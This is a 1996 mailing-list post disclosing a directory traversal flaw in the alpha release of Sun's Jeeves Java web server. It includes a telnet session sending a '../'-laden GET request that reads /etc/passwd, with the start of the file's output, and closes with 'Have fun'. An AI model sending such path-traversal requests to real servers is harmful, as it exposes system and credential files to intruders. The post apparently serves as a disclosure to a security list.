From stefan@netscafe.rotterdam.luna.net  Wed Sep  4 07:38:43 1996
Received: from netscafe.rotterdam.luna.net (netscafe.rotterdam.luna.net [194.151.24.23]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id HAA02981 for <best-of-security@suburbia.net>; Wed, 4 Sep 1996 07:38:30 +1000
Received: from netscafe.rotterdam.luna.net (localhost [127.0.0.1]) by netscafe.rotterdam.luna.net (8.7.5/8.7.3) with ESMTP id XAA06864 for <best-of-security@suburbia.net>; Tue, 3 Sep 1996 23:30:29 +0200 (MET DST)
Message-Id: <199609032130.XAA06864@netscafe.rotterdam.luna.net>
To: best-of-security@suburbia.net
Subject: Sun's Jeeves WWW Server
Date: Tue, 03 Sep 1996 23:30:28 +0200
From: Stefan Arentz <stefan@netscafe.rotterdam.luna.net>


Quoted from  http://www.javasoft.com/products/jeeves/index.html

Jeeves is JavaSoft's Java-Powered Internet Server and framework for
an extensible family of Java-based network services. Jeeves defines
the Java Servlet APIs for the quick and easy creation, installation,
administration and security of Java-based network servers.


Ok, this is an alpha release but still it's very very stupid of
Sun to let this slip through. Hopefully they fix it in the final
release :-/

Connected to xxxx.xxxx.xxxx.xxxx
Escape character is '^]'.
GET /../../../../../../../../../../etc/passwd
root:x:0:1:Super-User:/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
...

Have fun,
 -- Stefan Arentz, Luna Internet